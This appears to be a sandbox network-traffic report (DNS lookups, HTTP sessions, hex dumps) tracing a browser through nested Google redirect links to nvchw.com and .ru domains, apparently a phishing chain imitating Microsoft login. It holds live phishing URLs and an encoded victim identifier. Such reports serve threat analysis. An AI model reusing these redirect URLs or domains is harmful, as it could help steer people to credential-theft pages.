                                                                  Jan 13, 2025 22:37:20.183619022 CET192.168.2.161.1.1.10xdc56Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.183917999 CET192.168.2.161.1.1.10x9824Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.184051037 CET192.168.2.161.1.1.10x7c80Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.915595055 CET192.168.2.161.1.1.10x41fdStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.915786028 CET192.168.2.161.1.1.10xcae5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.947344065 CET192.168.2.161.1.1.10xdef7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.947509050 CET192.168.2.161.1.1.10x8ebaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.538053989 CET192.168.2.161.1.1.10xb91bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.538326979 CET192.168.2.161.1.1.10x5b93Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.570347071 CET192.168.2.161.1.1.10x70cbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.570703030 CET192.168.2.161.1.1.10x1492Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:23.251884937 CET192.168.2.161.1.1.10x3b35Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:23.252027035 CET192.168.2.161.1.1.10x1c9eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:30.187191963 CET192.168.2.161.1.1.10xe9b6Standard query (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:30.188632011 CET192.168.2.161.1.1.10xd683Standard query (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.932914972 CET192.168.2.161.1.1.10xd917Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.933042049 CET192.168.2.161.1.1.10xf623Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.936566114 CET192.168.2.161.1.1.10xd5c8Standard query (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.936775923 CET192.168.2.161.1.1.10xe372Standard query (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.005439043 CET192.168.2.161.1.1.10x5c88Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.005642891 CET192.168.2.161.1.1.10xfd8fStandard query (0)www.office.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.088362932 CET192.168.2.161.1.1.10x4813Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.088450909 CET192.168.2.161.1.1.10xbaedStandard query (0)www.office.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.255713940 CET192.168.2.161.1.1.10x7db0Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.255933046 CET192.168.2.161.1.1.10x2b8bStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                  Jan 13, 2025 22:38:23.257671118 CET192.168.2.161.1.1.10xb582Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:38:23.257672071 CET192.168.2.161.1.1.10x7fb2Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                  Jan 13, 2025 22:39:14.678488970 CET192.168.2.161.1.1.10x4e0cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:39:14.678703070 CET192.168.2.161.1.1.10xa122Standard query (0)www.google.com65IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 22:37:10.720110893 CET1.1.1.1192.168.2.160xdf96No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:10.720665932 CET1.1.1.1192.168.2.160xd6a1No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:11.763149977 CET1.1.1.1192.168.2.160x4e2cNo error (0)google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:11.763184071 CET1.1.1.1192.168.2.160x8969No error (0)google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:12.723942041 CET1.1.1.1192.168.2.160x2bc8No error (0)www.google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:12.724184990 CET1.1.1.1192.168.2.160x4b70No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:17.268603086 CET1.1.1.1192.168.2.160xf78No error (0)nvchw.com103.83.194.55A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:18.291781902 CET1.1.1.1192.168.2.160xace6No error (0)m7sn.shaceshrov.ru172.67.204.74A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:18.291781902 CET1.1.1.1192.168.2.160xace6No error (0)m7sn.shaceshrov.ru104.21.58.134A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:18.292793036 CET1.1.1.1192.168.2.160x7f72No error (0)m7sn.shaceshrov.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190009117 CET1.1.1.1192.168.2.160x738aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190009117 CET1.1.1.1192.168.2.160x738aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190009117 CET1.1.1.1192.168.2.160x738aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190009117 CET1.1.1.1192.168.2.160x738aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190046072 CET1.1.1.1192.168.2.160xb4afNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190046072 CET1.1.1.1192.168.2.160xb4afNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190958023 CET1.1.1.1192.168.2.160x9824No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.190958023 CET1.1.1.1192.168.2.160x9824No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.191080093 CET1.1.1.1192.168.2.160x7c80No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.191596985 CET1.1.1.1192.168.2.160xdc56No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.922386885 CET1.1.1.1192.168.2.160x41fdNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.922386885 CET1.1.1.1192.168.2.160x41fdNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.922699928 CET1.1.1.1192.168.2.160xcae5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.955178022 CET1.1.1.1192.168.2.160xdef7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.955178022 CET1.1.1.1192.168.2.160xdef7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.955178022 CET1.1.1.1192.168.2.160xdef7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.955178022 CET1.1.1.1192.168.2.160xdef7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.545164108 CET1.1.1.1192.168.2.160xb91bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.545164108 CET1.1.1.1192.168.2.160xb91bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.545253038 CET1.1.1.1192.168.2.160x5b93No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.577495098 CET1.1.1.1192.168.2.160x1492No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.577627897 CET1.1.1.1192.168.2.160x70cbNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:21.577627897 CET1.1.1.1192.168.2.160x70cbNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:23.258610964 CET1.1.1.1192.168.2.160x3b35No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:30.324635029 CET1.1.1.1192.168.2.160xd683No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:30.339071989 CET1.1.1.1192.168.2.160xe9b6No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:30.339071989 CET1.1.1.1192.168.2.160xe9b6No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.939866066 CET1.1.1.1192.168.2.160xd917No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:31.940917015 CET1.1.1.1192.168.2.160xf623No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:32.034033060 CET1.1.1.1192.168.2.160xd5c8No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:32.034033060 CET1.1.1.1192.168.2.160xd5c8No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:32.069576025 CET1.1.1.1192.168.2.160xe372No error (0)ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.013266087 CET1.1.1.1192.168.2.160xfd8fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.013266087 CET1.1.1.1192.168.2.160xfd8fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.013287067 CET1.1.1.1192.168.2.160x5c88No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:33.013287067 CET1.1.1.1192.168.2.160x5c88No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:34.173305988 CET1.1.1.1192.168.2.160xb8f1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:34.173305988 CET1.1.1.1192.168.2.160xb8f1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.072741985 CET1.1.1.1192.168.2.160xd7f9No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.072741985 CET1.1.1.1192.168.2.160xd7f9No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.095524073 CET1.1.1.1192.168.2.160x4813No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.095524073 CET1.1.1.1192.168.2.160x4813No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.121166945 CET1.1.1.1192.168.2.160xbaedNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:35.121166945 CET1.1.1.1192.168.2.160xbaedNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.262495041 CET1.1.1.1192.168.2.160x7db0No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.262495041 CET1.1.1.1192.168.2.160x7db0No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.262495041 CET1.1.1.1192.168.2.160x7db0No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.262936115 CET1.1.1.1192.168.2.160x2b8bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:36.262936115 CET1.1.1.1192.168.2.160x2b8bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:38:23.265010118 CET1.1.1.1192.168.2.160x7fb2No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:38:23.265188932 CET1.1.1.1192.168.2.160xb582No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:39:14.686209917 CET1.1.1.1192.168.2.160x4e0cNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:39:14.686256886 CET1.1.1.1192.168.2.160xa122No error (0)www.google.com65IN (0x0001)false
                                                                  • www.google.com
                                                                  • nvchw.com
                                                                  • https:
                                                                    • m7sn.shaceshrov.ru
                                                                    • cdnjs.cloudflare.com
                                                                    • code.jquery.com
                                                                    • challenges.cloudflare.com
                                                                    • ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru
                                                                  • a.nel.cloudflare.com
                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.1649700184.30.131.24580
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 13, 2025 22:37:13.793035984 CET874INHTTP/1.1 200 OK
                                                                  Content-Type: application/ocsp-response
                                                                  Content-Length: 471
                                                                  Cache-Control: max-age=2098
                                                                  Expires: Mon, 13 Jan 2025 22:12:11 GMT
                                                                  Date: Mon, 13 Jan 2025 21:37:13 GMT
                                                                  Connection: keep-alive
                                                                  Server-Timing: cdn-cache; desc=HIT
                                                                  Server-Timing: edge; dur=1
                                                                  Akamai-GRN: 0.887a7b5c.1736804233.d69aaa
                                                                  Server-Timing: ak_p; desc="1736804233698_1551596168_14064298_13_737_12250_0_-";dur=1
                                                                  Data Raw: 30 82 01 d3 0a 01 00 a0 82 01 cc 30 82 01 c8 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b9 30 82 01 b5 30 81 9e a2 16 04 14 03 de 50 35 56 d1 4c bb 66 f0 a3 e2 1b 1b c3 97 b2 3d d1 55 18 0f 32 30 32 35 30 31 31 32 31 38 32 37 33 38 5a 30 73 30 71 30 49 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 80 51 06 01 32 ad 9a c2 7d 51 87 a0 e8 87 fb 01 62 01 55 ee 04 14 03 de 50 35 56 d1 4c bb 66 f0 a3 e2 1b 1b c3 97 b2 3d d1 55 02 10 02 74 2e aa 17 ca 8e 21 c7 17 bb 1f fc fd 0c a0 80 00 18 0f 32 30 32 35 30 31 31 32 31 38 32 37 33 38 5a a0 11 18 0f 32 30 32 35 30 31 31 39 31 38 32 37 33 38 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 0f de 1e 04 60 fd ae 8f 9f 4f 3c 94 51 99 7e 66 8a 13 9c d9 4f 87 33 22 03 9b 30 7d 02 1d 21 06 ce f0 4b 59 14 8d d0 4b 5a 28 30 fc 81 0a d1 e2 31 36 a5 55 32 79 c7 84 11 da 5a e7 c4 7e e0 da 04 59 11 14 03 3b 9c 3d f6 78 3a 32 62 ff 03 b7 f2 ec 81 0d 42 45 92 de a4 f3 10 95 ca 5e 75 89 79 e6 4d 87 0b 2b 4a 16 7e 0d 18 92 38 d5 1e cf d4 0f e8 f7 0d 70 42 99 56 4d 2b [TRUNCATED]
                                                                  Data Ascii: 00+000P5VLf=U20250112182738Z0s0q0I0+Q2}QbUP5VLf=Ut.!20250112182738Z20250119182738Z0*H`O<Q~fO3"0}!KYKZ(016U2yZ~Y;=x:2bBE^uyM+J~8pBVM+Xxrc4aZVBAmq2x=}ij4_W0KOGd?>oeaT4gUo=pS}O1hl/afKx8tjj7PHU\OzM


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.1649711142.250.185.1324437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:13 UTC2162OUTGET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENj [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:13 UTC2391INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_f9idd3JDbUGkM6-3tJQQQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Mon, 13 Jan 2025 21:37:13 GMT
                                                                  Server: gws
                                                                  Content-Length: 1622
                                                                  X-XSS-Protection: 0
                                                                  Set-Cookie: NID=520=g-PPRcdlH3h6OszxCLUJmdxJxzb9DU2r7WPIpar31-6Llmgu4pZehPYCoyBCpP1aG2SflvTb4-SwNgUgMzbR5LvoP7UrD4hQ7MiTuX_C9y7PPyKtbQH4KUidPwnCAR4A1r-NZXFt-Zf-RsgJDMTu265zRQonxW8o4hL2kqyg89W_8qZhACh8qL5FB2A2TD6ET28ieBO4_w; expires=Tue, 15-Jul-2025 21:37:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:37:13 UTC1435INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=
                                                                  2025-01-13 21:37:13 UTC126INData Raw: 5a 6c 59 6d 5a 70 52 44 51 6d 51 6a 45 6d 52 6a 51 6d 62 57 35 31 61 55 51 30 4a 6b 49 78 4a 6b 59 30 4a 6d 39 69 63 58 52 48 4d 79 5a 45 4e 43 5a 6b 61 7a 64 6f 57 6c 5a 45 4e 43 5a 30 65 7a 56 4e 52 54 51 6d 54 46 68 74 65 44 46 50 55 57 64 6b 57 46 42 5a 63 33 73 31 64 30 63 35 65 31 46 46 4e 69 5a 44 54 30 59 30 4a 6a 4d 7a 4a 6e 56 35 5a 6e 55 75 62 32 5a 6c 5a 57 70 70
                                                                  Data Ascii: ZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWpp
                                                                  2025-01-13 21:37:13 UTC61INData Raw: 4d 7a 4d 6d 52 54 51 6d 64 48 52 69 62 57 51 78 4d 79 5a 76 59 6e 46 30 52 44 51 6d 51 6a 45 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                  Data Ascii: MzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm">here</A>.</BODY></HTML>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.1649713142.250.185.1324437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
